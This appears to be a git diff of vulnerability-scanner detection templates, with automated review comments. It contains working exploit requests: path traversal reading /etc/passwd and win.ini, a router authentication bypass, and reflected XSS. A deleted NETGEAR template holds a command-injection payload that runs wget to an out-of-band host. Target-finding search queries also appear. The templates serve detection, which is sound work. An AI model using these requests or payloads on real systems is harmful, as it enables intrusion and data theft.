@@ -4,8 +4,11 @@ info: name: KevinLAB HEMS Undocumented Backdoor Account author: gy741 severity: critical - description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php + description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the + RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users + settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php tags: kevinlab,default-login,backdoor requests: diff --git a/vulnerabilities/other/keycloak-xss.yaml b/vulnerabilities/other/keycloak-xss.yaml index 8397f21f07..6f73adfd83 100644 --- a/vulnerabilities/other/keycloak-xss.yaml +++ b/vulnerabilities/other/keycloak-xss.yaml @@ -4,7 +4,8 @@ info: name: Keycloak <= 8.0 - Cross Site Scripting author: incogbyte severity: info - reference: https://cure53.de/pentest-report_keycloak.pdf + reference: + - https://cure53.de/pentest-report_keycloak.pdf tags: keycloak,xss requests: 
diff --git a/vulnerabilities/other/kingdee-eas-directory-traversal.yaml b/vulnerabilities/other/kingdee-eas-directory-traversal.yaml new file mode 100644 index 0000000000..b11c6a4bbf --- /dev/null +++ b/vulnerabilities/other/kingdee-eas-directory-traversal.yaml @@ -0,0 +1,35 @@ +id: kingdee-eas-directory-traversal + +info: + name: Kingdee EAS - Directory Traversal + author: ritikchaddha + severity: medium + description: Kingdee OA server_file has a directory traversal vulnerability, attackers can obtain sensitive server information through directory traversal. + reference: + - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E8%9D%B6OA%20server_file%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md + tags: kingdee,lfi,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/appmonitor/protected/selector/server_file/files?folder=C://&suffix=" + - "{{BaseURL}}/appmonitor/protected/selector/server_file/files?folder=/&suffix=" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{"name":"Windows","path":"C:\\\\Windows","folder":true}' + - '{"name":"root","path":"/root","folder":true}' + condition: or + + - type: word + words: + - "application/json" + part: header + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/kingsoft-v8-file-read.yaml b/vulnerabilities/other/kingsoft-v8-file-read.yaml new file mode 100644 index 0000000000..a103be2311 --- /dev/null +++ b/vulnerabilities/other/kingsoft-v8-file-read.yaml 
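Review bot: The first body word in kingdee-eas-directory-traversal is single-quoted, so YAML keeps every backslash literally and the matcher looks for `C:\\\\Windows` with four backslashes, whereas a JSON encoder serialising the path `C:\Windows` emits only two (`"path":"C:\\Windows"`). If the server responds that way the Windows word never matches, and since the second word only describes `/root`, Windows hosts would go undetected even though the `C://` request fires; confirm against a captured response and, if so, use `'{"name":"Windows","path":"C:\\Windows","folder":true}'`. The description also reads as a comma splice (`... directory traversal vulnerability, attackers can obtain ...`); splitting it into two sentences would read better.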
@@ -0,0 +1,32 @@ +id: kingsoft-v8-file-read + +info: + name: Kingsoft V8 File Read + author: ritikchaddha + severity: high + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/b6f8fbfef46ad1c3f8d5715dd19b00ca875341c2/_book/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%87%91%E5%B1%B1/%E9%87%91%E5%B1%B1%20V8%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + tags: kingsoft,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/htmltopdf/downfile.php?filename=/windows/win.ini" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "for 16-bit app support" + - "[extensions]" + condition: and + + - type: word + part: header + words: + - "application/zip" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/kyocera-m2035dn-lfi.yaml b/vulnerabilities/other/kyocera-m2035dn-lfi.yaml new file mode 100644 index 0000000000..35651ada5b --- /dev/null +++ b/vulnerabilities/other/kyocera-m2035dn-lfi.yaml @@ -0,0 +1,26 @@ +id: kyocera-m2035dn-lfi + +info: + name: Kyocera Command Center RX ECOSYS M2035dn - Arbitrary File Retrieval + author: 0x_Akoko + severity: high + description: Kyocera Command Center RX ECOSYS M2035dn - Unauthenticated arbitrary file retrieval. + reference: + - https://www.exploit-db.com/exploits/50738 + - https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html + tags: printer,iot,kyocera,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/js/../../../../../../../../etc/passwd%00.jpg" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/laravel-filemanager-lfi.yaml b/vulnerabilities/other/laravel-filemanager-lfi.yaml new file mode 100644 index 0000000000..d9287c7b90 --- /dev/null +++ b/vulnerabilities/other/laravel-filemanager-lfi.yaml 
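Review bot: kingsoft-v8-file-read has no `description` in its `info` block, unlike the other templates added in this commit (jinfornet-jreport-lfi, kingdee-eas-directory-traversal, kyocera-m2035dn-lfi); a one-line `description:` naming the `/htmltopdf/downfile.php` endpoint and the unrestricted `filename` parameter would give triage something to work with. The header matcher requires `application/zip`; if `downfile.php` really returns an archive, the win.ini strings can only appear in the body when the content is stored uncompressed, so it is worth confirming on a real response that the body and header matchers can both be satisfied at once.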
@@ -0,0 +1,29 @@ +id: laravel-filemanager-lfi + +info: + name: UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read + author: hackerarpan + severity: high + reference: + - https://www.exploit-db.com/exploits/48166 + - https://github.com/UniSharp/laravel-filemanager + metadata: + google-dork: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io + shodan-query: http.html:"Laravel FileManager" + tags: lfi,unisharp,laravel,filemanager,fileupload,lfr + +requests: + - method: GET + path: + - "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/lotuscms-rce.yaml b/vulnerabilities/other/lotuscms-rce.yaml index e9cf4de15f..3092588555 100644 --- a/vulnerabilities/other/lotuscms-rce.yaml +++ b/vulnerabilities/other/lotuscms-rce.yaml @@ -4,7 +4,8 @@ info: name: LotusCMS 3.0 eval() RCE author: pikpikcu severity: critical - reference: https://github.com/Hood3dRob1n/LotusCMS-Exploit + reference: + - https://github.com/Hood3dRob1n/LotusCMS-Exploit tags: lotuscms,rce requests: diff --git a/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml index 3fca056486..6993c365f5 100644 --- a/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml +++ b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml @@ -4,9 +4,10 @@ info: name: Luftguitar CMS Arbitrary File Upload author: pikpikcu severity: high - tags: luftguitar description: A vulnerability in Luftguitar CMS allows remote unauthenticated users to upload files to the remote service via the 'ftb.imagegallery.aspx' endpoint. - reference: https://www.exploit-db.com/exploits/14991 + reference: + - https://www.exploit-db.com/exploits/14991 + tags: luftguitar requests: - method: GET 
diff --git a/vulnerabilities/other/maccmsv10-backdoor.yaml b/vulnerabilities/other/maccmsv10-backdoor.yaml index 249495b4ed..eaad3100fe 100644 --- a/vulnerabilities/other/maccmsv10-backdoor.yaml +++ b/vulnerabilities/other/maccmsv10-backdoor.yaml @@ -1,4 +1,5 @@ id: maccmsv10-backdoor + info: name: Maccmsv10 Backdoor author: princechaddha diff --git a/vulnerabilities/other/magicflow-lfi.yaml b/vulnerabilities/other/magicflow-lfi.yaml index 08cf21df8d..31412a5435 100644 --- a/vulnerabilities/other/magicflow-lfi.yaml +++ b/vulnerabilities/other/magicflow-lfi.yaml @@ -5,7 +5,8 @@ info: author: gy741 severity: critical description: A vulnerability in MagicFlow allows remote unauthenticated users to access locally stored files on the server and return their content via the '/msa/main.xp' endpoint and the 'Fun' parameter. - reference: https://www.seebug.org/vuldb/ssvid-89258 + reference: + - https://www.seebug.org/vuldb/ssvid-89258 tags: magicflow,lfi requests: @@ -19,7 +20,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/vulnerabilities/other/metinfo-lfi.yaml b/vulnerabilities/other/metinfo-lfi.yaml index fca0ca4919..4628dea9d4 100644 --- a/vulnerabilities/other/metinfo-lfi.yaml +++ b/vulnerabilities/other/metinfo-lfi.yaml @@ -1,10 +1,12 @@ id: metinfo-lfi + info: name: MetInfo 6.0.0/6.1.0 LFI author: pikpikcu severity: high - reference: https://paper.seebug.org/676/ description: A vulnerability in MetInfo allows remote unauthenticated attackers access to locally stored files and their content. + reference: + - https://paper.seebug.org/676/ tags: metinfo,lfi requests: diff --git a/vulnerabilities/other/microstrategy-ssrf.yaml b/vulnerabilities/other/microstrategy-ssrf.yaml index adfda438b6..df76c1a881 100644 --- a/vulnerabilities/other/microstrategy-ssrf.yaml +++ b/vulnerabilities/other/microstrategy-ssrf.yaml 
@@ -1,11 +1,12 @@ id: microstrategy-ssrf info: - name: MicroStrategy tinyurl - BSSRF + name: MicroStrategy tinyurl - Server-Side Request Forgery (Blind) author: organiccrap severity: high - description: Blind server-side request forgery vulnerability on MicroStrategy URL shortener. - reference: https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204 + description: Blind server-side (SSRF) request forgery vulnerability on MicroStrategy URL shortener. + reference: + - https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204 tags: microstrategy,ssrf requests: diff --git a/vulnerabilities/other/microweber-xss.yaml b/vulnerabilities/other/microweber-xss.yaml new file mode 100644 index 0000000000..65c721fd33 --- /dev/null +++ b/vulnerabilities/other/microweber-xss.yaml @@ -0,0 +1,40 @@ +id: microweber-xss + +info: + name: Microweber Cross-Site Scripting + author: gy741 + severity: high + description: Microweber prior to 1.2.11 is susceptible to reflected cross-site Scripting via Packagist microweber/microweber. + reference: + - https://github.com/microweber/microweber/issues/809 + - https://github.com/microweber/microweber + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 + metadata: + shodan-query: http.favicon.hash:780351152 + tags: microweber,xss,oss + +requests: + - method: GET + path: + - '{{BaseURL}}/editor_tools/module?type=files/admin">¶ms=filetype=images#path=' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '" 0="filetype=images"' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/30 diff --git a/vulnerabilities/other/minimouse-lfi.yaml b/vulnerabilities/other/minimouse-lfi.yaml index 22c5a7ef9a..4164b1a4cf 100644 --- a/vulnerabilities/other/minimouse-lfi.yaml +++ b/vulnerabilities/other/minimouse-lfi.yaml 
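Review bot: The rewritten description in microstrategy-ssrf places the acronym inside the term it abbreviates (`Blind server-side (SSRF) request forgery vulnerability`); it should read `description: Blind server-side request forgery (SSRF) vulnerability on MicroStrategy URL shortener.`. The `name` line in the same hunk already spells it out as `Server-Side Request Forgery (Blind)`, so the two fields should agree.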
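Review bot: The request path in microweber-xss contains `¶ms=filetype=images`, which looks like an HTML-entity rendering of `&params=filetype=images` (`&para` without a semicolon decodes to `¶`); as committed the query string has no parameter separator after `admin">`, so the reflection the body matcher expects (`" 0="filetype=images"`) would presumably not be produced. Confirm the intended path against the referenced issue and, if so, change it to `'{{BaseURL}}/editor_tools/module?type=files/admin">&params=filetype=images#path='`. The trailing `#path=` is a URL fragment, which HTTP clients do not transmit, so it can be dropped unless the reference relies on it.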
@@ -5,7 +5,8 @@ info: author: 0x_Akoko severity: high description: A vulnerability in Mini Mouse allows remote unauthenticated attackers to include and disclose the content of locally stored files via the 'file' parameter. - reference: https://www.exploit-db.com/exploits/49744 + reference: + - https://www.exploit-db.com/exploits/49744 tags: minimouse,lfi requests: diff --git a/vulnerabilities/other/mpsec-lfi.yaml b/vulnerabilities/other/mpsec-lfi.yaml index b4eb79eedc..1bf2038934 100644 --- a/vulnerabilities/other/mpsec-lfi.yaml +++ b/vulnerabilities/other/mpsec-lfi.yaml @@ -4,7 +4,8 @@ info: name: MPSec ISG1000 Local File Read author: pikpikcu severity: high - reference: https://twitter.com/sec715/status/1402884871173795842 + reference: + - https://twitter.com/sec715/status/1402884871173795842 tags: mpsec,lfi requests: diff --git a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml index 0eac266103..c4cbfa7b17 100644 --- a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml +++ b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml @@ -7,7 +7,7 @@ info: reference: - https://www.shodan.io/search?query=http.title%3A%22Outlook%22 - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html - tags: miscrsoft,exchange,owa,xss + tags: microsoft,exchange,owa,xss requests: - method: GET @@ -29,4 +29,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/vulnerabilities/other/myucms-lfr.yaml b/vulnerabilities/other/myucms-lfr.yaml index 9b0197070e..327a403ef9 100644 --- a/vulnerabilities/other/myucms-lfr.yaml +++ b/vulnerabilities/other/myucms-lfr.yaml 
@@ -1,10 +1,12 @@ id: myucms-lfr + info: name: MyuCMS Local File Read author: princechaddha severity: high + reference: + - https://blog.csdn.net/yalecaltech/article/details/104908257 tags: myucms,lfi - reference: https://blog.csdn.net/yalecaltech/article/details/104908257 requests: - method: GET diff --git a/vulnerabilities/other/natshell-path-traversal.yaml b/vulnerabilities/other/natshell-path-traversal.yaml index 391bb848a2..629dd6eec9 100644 --- a/vulnerabilities/other/natshell-path-traversal.yaml +++ b/vulnerabilities/other/natshell-path-traversal.yaml @@ -4,7 +4,10 @@ info: name: NatShell Path Traversal author: pikpikcu severity: high - reference: https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw + reference: + - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw + metadata: + fofa-query: title="蓝海卓越计费管理系统" tags: natshell,lfi requests: diff --git a/vulnerabilities/other/natshell-rce.yaml b/vulnerabilities/other/natshell-rce.yaml index a9cb6aa19c..389048e371 100644 --- a/vulnerabilities/other/natshell-rce.yaml +++ b/vulnerabilities/other/natshell-rce.yaml @@ -4,7 +4,8 @@ info: name: NatShell Debug File RCE author: pikpikcu severity: critical - reference: https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw + reference: + - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw tags: natshell,rce requests: diff --git a/vulnerabilities/other/netgear-router-auth-bypass.yaml b/vulnerabilities/other/netgear-router-auth-bypass.yaml index 1524463563..2de4ae3d45 100644 --- a/vulnerabilities/other/netgear-router-auth-bypass.yaml +++ b/vulnerabilities/other/netgear-router-auth-bypass.yaml 
@@ -4,7 +4,8 @@ info: name: NETGEAR DGN2200v1 Router Authentication Bypass author: gy741 severity: high - description: NETGEAR DGN2200v1 Router does not require authentication if a page has “.jpg”, “.gif”, or “ess_” substrings, however matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring (e.g., “?.gif”). + description: NETGEAR DGN2200v1 Router does not require authentication if a page has ".jpg", ".gif", or "ess_" substrings, however matches the entire URL. Any page on the device can therefore be accessed, including + those that require authentication, by appending a GET variable with the relevant substring (e.g., "?.gif"). reference: - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 @@ -22,7 +23,6 @@ requests: Host: {{Hostname}} Accept: */* - matchers-condition: and matchers: - type: status diff --git a/vulnerabilities/other/netgear-router-exposure.yaml b/vulnerabilities/other/netgear-router-exposure.yaml index 381f0973b1..cafcc346b8 100644 --- a/vulnerabilities/other/netgear-router-exposure.yaml +++ b/vulnerabilities/other/netgear-router-exposure.yaml @@ -2,13 +2,13 @@ id: netgear-router-exposure info: name: NETGEAR Router S/N Disclosure + author: geeknik + severity: critical description: Multiple NETGEAR router models disclose their serial number which can be used to obtain the admin password if password recovery is enabled. reference: - https://www.exploit-db.com/exploits/47117 - https://www.exploit-db.com/exploits/45741 - author: geeknik - severity: critical - tags: netgear,exposure,iot + tags: netgear,exposure,iot,router requests: - method: GET 
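Review bot: Removing `matchers-condition: and` in netgear-router-auth-bypass changes the default combination to OR, so if the `matchers` list still holds a second matcher after `- type: status` (the list continues outside the hunk), a bare HTTP 200 from any page would now be reported as an authentication bypass. If the intent was to leave a single status matcher that is harmless; otherwise the line should be restored as `matchers-condition: and`. The description hunk above also swaps the typographic quotes for straight ones, which is the right direction and should be applied to the new `shodan-query` in ns-asg-file-read in this same commit.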
diff --git a/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml b/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml new file mode 100644 index 0000000000..4c8c191714 --- /dev/null +++ b/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml @@ -0,0 +1,27 @@ +id: netgear-wac124-router-auth-bypass + +info: + name: NETGEAR WAC124 Router Authentication Bypass + author: gy741 + severity: high + description: | + This vulnerability allows network-adjacent attackers to bypass authentication on affected of WAC124, AC2000 routers. Authentication is not required to exploit this vulnerability. + reference: + - https://flattsecurity.medium.com/finding-bugs-to-trigger-unauthenticated-command-injection-in-a-netgear-router-psv-2022-0044-2b394fb9edc + - https://kb.netgear.com/000064730/Security-Advisory-for-Multiple-Vulnerabilities-on-the-WAC124-PSV-2022-0044 + tags: netgear,auth-bypass,router,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/setup.cgi?next_file=debug.htm&x=currentsetting.htm" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Enable Telnet" \ No newline at end of file diff --git a/vulnerabilities/other/netgear-wnap320-rce.yaml b/vulnerabilities/other/netgear-wnap320-rce.yaml deleted file mode 100644 index 3fb5459ca4..0000000000 --- a/vulnerabilities/other/netgear-wnap320-rce.yaml +++ /dev/null 
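Review bot: netgear-wac124-router-auth-bypass is added without a trailing newline (`\ No newline at end of file`) while this same commit fixes exactly that in ms-exchange-server-reflected-xss, nginx-module-vts-xss and nuuo-nvrmini2-rce; the new file should end with one. The `description: |` literal block also keeps a trailing newline in the value, so `description: |-` is the better header, and the text `affected of WAC124, AC2000 routers` should read `affected WAC124 and AC2000 routers`. The `Enable Telnet` word matcher has no `part:`, which defaults to the body; stating `part: body` would make that explicit, consistent with the other templates in this change.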
@@ -1,26 +0,0 @@ -id: netgear-wnap320-rce - -info: - name: NETGEAR WNAP320 Access Point - Remote Code Execution (Unauthenticated) - author: gy741 - severity: critical - description: vulnerabilities in the web-based management interface of NETGEAR WNAP320 Access Point could allow an authenticated, remote attacker to perform command injection attacks against an affected device. - reference: - - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE - tags: netgear,rce,oast,router - -requests: - - raw: - - | - POST /boardDataWW.php HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/x-www-form-urlencoded - - macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/vulnerabilities/other/netis-info-leak.yaml b/vulnerabilities/other/netis-info-leak.yaml index bb9688eb93..dfe9ded8c3 100644 --- a/vulnerabilities/other/netis-info-leak.yaml +++ b/vulnerabilities/other/netis-info-leak.yaml @@ -4,8 +4,9 @@ info: name: Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak author: gy741 severity: medium - reference: https://www.exploit-db.com/exploits/48384 description: A vulnerability in Netis allows remote unauthenticated users to disclose the WiFi password of the remote device. + reference: + - https://www.exploit-db.com/exploits/48384 tags: netis,exposure requests: diff --git a/vulnerabilities/other/nginx-module-vts-xss.yaml b/vulnerabilities/other/nginx-module-vts-xss.yaml index 006da625d1..f0ca677575 100644 --- a/vulnerabilities/other/nginx-module-vts-xss.yaml +++ b/vulnerabilities/other/nginx-module-vts-xss.yaml 
@@ -1,10 +1,10 @@ id: nginx-module-vts-xss info: - name: Nginx virtual host traffic status module XSS + name: Nginx Virtual Host Traffic Status Module - Cross-Site Scripting author: madrobot severity: medium - tags: nginx,xss + tags: nginx,xss,status requests: - method: GET @@ -25,4 +25,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/vulnerabilities/other/ns-asg-file-read.yaml b/vulnerabilities/other/ns-asg-file-read.yaml index 60008dd594..a18b450540 100644 --- a/vulnerabilities/other/ns-asg-file-read.yaml +++ b/vulnerabilities/other/ns-asg-file-read.yaml @@ -2,23 +2,32 @@ id: nsasg-arbitrary-file-read info: name: NS ASG Arbitrary File Read - author: pikpikcu + author: pikpikcu,ritikchaddha severity: high - reference: https://zhuanlan.zhihu.com/p/368054963 + reference: + - https://zhuanlan.zhihu.com/p/368054963 + - http://wiki.xypbk.com/Web安全/网康%20NS-ASG安全网关/网康%20NS-ASG安全网关%20任意文件读取漏洞.md + metadata: + fofa-query: app="网康科技-NS-ASG安全网关" + shodan-query: http.title:“NS-ASG” tags: nsasg,lfi requests: - method: GET path: - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd" + - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php" - matchers-condition: and + stop-at-first-match: true + matchers-condition: or matchers: - - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - - type: status - status: - - 200 + - type: word + part: body + words: + - "$certfile" + - "application/pdf" + condition: and diff --git a/vulnerabilities/other/nuuo-file-inclusion.yaml b/vulnerabilities/other/nuuo-file-inclusion.yaml index 0cfcc394fe..f577991d4f 100644 --- a/vulnerabilities/other/nuuo-file-inclusion.yaml +++ b/vulnerabilities/other/nuuo-file-inclusion.yaml 
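Review bot: The `shodan-query` added to ns-asg-file-read uses typographic quotes (`http.title:“NS-ASG”`); Shodan filter syntax expects ASCII double quotes, so the query as written searches for the literal curly-quote characters. It should be `shodan-query: http.title:"NS-ASG"`, matching the straight quotes in the `fofa-query` on the line above and in the `fofa-query` added to natshell-path-traversal in this commit. The new second reference URL mixes unencoded CJK characters with `%20`; percent-encoding the whole path would avoid tool-dependent handling of the link.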
@@ -1,10 +1,11 @@ id: nuuo-file-inclusion info: - name: NUUO NVRmini 2 3.0.8 Local File Disclosure + name: NUUO NVRmini 2 v3.0.8 - Atrbitary File Retrieval author: princechaddha severity: high - reference: https://www.exploit-db.com/exploits/40211 + reference: + - https://www.exploit-db.com/exploits/40211 tags: nuuo,lfi requests: diff --git a/vulnerabilities/other/nuuo-nvrmini2-rce.yaml b/vulnerabilities/other/nuuo-nvrmini2-rce.yaml index dfad086cc8..8f142eba45 100644 --- a/vulnerabilities/other/nuuo-nvrmini2-rce.yaml +++ b/vulnerabilities/other/nuuo-nvrmini2-rce.yaml @@ -4,11 +4,11 @@ info: name: NUUO NVRmini 2 3.0.8 - Remote Code Execution author: berkdusunur severity: critical - tags: rce reference: - https://www.exploit-db.com/exploits/45070 - https://github.com/berkdsnr/NUUO-NVRMINI-RCE - https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html + tags: rce,nuuo requests: - method: GET @@ -24,4 +24,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/vulnerabilities/other/oa-tongda-path-traversal.yaml b/vulnerabilities/other/oa-tongda-path-traversal.yaml index 56aa950f64..0049e8c3f5 100644 --- a/vulnerabilities/other/oa-tongda-path-traversal.yaml +++ b/vulnerabilities/other/oa-tongda-path-traversal.yaml @@ -4,7 +4,8 @@ info: name: OA TongDa Path Traversal author: pikpikcu severity: critical - reference: https://github.com/jas502n/OA-tongda-RCE + reference: + - https://github.com/jas502n/OA-tongda-RCE tags: tongda,lfi requests: diff --git a/vulnerabilities/other/oa-v9-uploads-file.yaml b/vulnerabilities/other/oa-v9-uploads-file.yaml index 7f4da77bff..e0224cf506 100644 --- a/vulnerabilities/other/oa-v9-uploads-file.yaml +++ b/vulnerabilities/other/oa-v9-uploads-file.yaml 
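Review bot: The new `name` in nuuo-file-inclusion misspells the vulnerability class (`Atrbitary File Retrieval`); it should be `name: NUUO NVRmini 2 v3.0.8 - Arbitrary File Retrieval`. The sibling template nuuo-nvrmini2-rce in this commit keeps the `3.0.8` form without a `v` prefix, so the two names could also agree on the version format.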
@@ -5,7 +5,8 @@ info: author: pikpikcu severity: high description: A vulnerability in OA V9 uploadOperation.jsp endpoint allows remote attackers to upload arbitrary files to the server. These files can be subsequently called and are executed by the remote software. - reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + reference: + - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g tags: rce,jsp requests: diff --git a/vulnerabilities/other/odoo-cms-redirect.yaml b/vulnerabilities/other/odoo-cms-redirect.yaml index 9ccd8e1d01..3fecc9364a 100644 --- a/vulnerabilities/other/odoo-cms-redirect.yaml +++ b/vulnerabilities/other/odoo-cms-redirect.yaml @@ -1,11 +1,13 @@ id: odoo-cms-redirect info: - name: Odoo CMS - Open redirection all Version + name: Odoo CMS - Open Redirect author: 0x_Akoko - description: Odoo CMS - Open redirection all Version. - reference: https://cxsecurity.com/issue/WLB-2021020143 severity: low + description: Odoo CMS - Open redirection in all versions due to Odoo's policy. + reference: + - https://cxsecurity.com/issue/WLB-2021020143 + - https://www.odoo.com/page/security-nonvuln-redirectors tags: odoo,redirect requests: diff --git a/vulnerabilities/other/oliver-library-lfi.yaml b/vulnerabilities/other/oliver-library-lfi.yaml new file mode 100644 index 0000000000..4d3eaf3db1 --- /dev/null +++ b/vulnerabilities/other/oliver-library-lfi.yaml 
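Review bot: The new description in odoo-cms-redirect (`Open redirection in all versions due to Odoo's policy`) leaves unclear what the policy is; the second reference added in the same hunk is Odoo's page on non-vulnerability redirectors, so something like `description: Odoo CMS allows open redirection in all versions; Odoo classes redirectors as non-vulnerabilities by policy (see second reference).` would tell a reader why the severity is `low`. The name change to `Odoo CMS - Open Redirect` is consistent with the naming used elsewhere in this commit.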
@@ -0,0 +1,25 @@ +id: oliver-library-lfi + +info: + name: Oliver Library Server v5 <8.00.008.053 - Arbitrary File Retrieval + author: gy741 + severity: high + description: An arbitrary file retrieval vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file retrieval by an attacker using unsanitized user supplied input. + reference: + - https://www.exploit-db.com/exploits/50599 + - https://www.softlinkint.com/product/oliver/ + tags: windows,lfi,oliver + +requests: + - method: GET + path: + - "{{BaseURL}}/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini" + + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/vulnerabilities/other/opensis-lfi.yaml b/vulnerabilities/other/opensis-lfi.yaml index f2584939c4..8037b9afd6 100644 --- a/vulnerabilities/other/opensis-lfi.yaml +++ b/vulnerabilities/other/opensis-lfi.yaml @@ -4,7 +4,8 @@ info: name: openSIS 5.1 - 'ajax.php' Local File Inclusion author: pikpikcu severity: high - description: An attacker can exploit a vulnerability in openSIS to obtain potentially sensitive information and execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible. + description: An attacker can exploit a vulnerability in openSIS to obtain potentially sensitive information and execute arbitrary local scripts in the context of the Web server process. This may allow the attacker + to compromise the application and computer; other attacks are also possible. reference: - https://www.exploit-db.com/exploits/38039 tags: opensis,lfi diff --git a/vulnerabilities/other/openvpn-hhi.yaml b/vulnerabilities/other/openvpn-hhi.yaml index 7bcb4e1a2f..894e0b9a47 100644 --- a/vulnerabilities/other/openvpn-hhi.yaml +++ b/vulnerabilities/other/openvpn-hhi.yaml 
@@ -3,8 +3,8 @@ id: openvpn-hhi
 info:
 name: OpenVPN Host Header Injection
 author: twitter.com/Dheerajmadhukar
- description: A vulnerability in OpenVPN Access Server allows remote attackers to inject arbitrary redirection URLs by using the 'Host' HTTP header field.
 severity: info
+ description: A vulnerability in OpenVPN Access Server allows remote attackers to inject arbitrary redirection URLs by using the 'Host' HTTP header field.
 tags: openvpn,hostheader-injection
 requests:
diff --git a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml
index 7b87b1527b..a1a850487d 100644
--- a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml
+++ b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml
@@ -1,14 +1,18 @@
 id: optilink-ont1gew-gpon-rce
 info:
- name: OptiLink ONT1GEW GPON - Pre-Auth Remote Code Execution
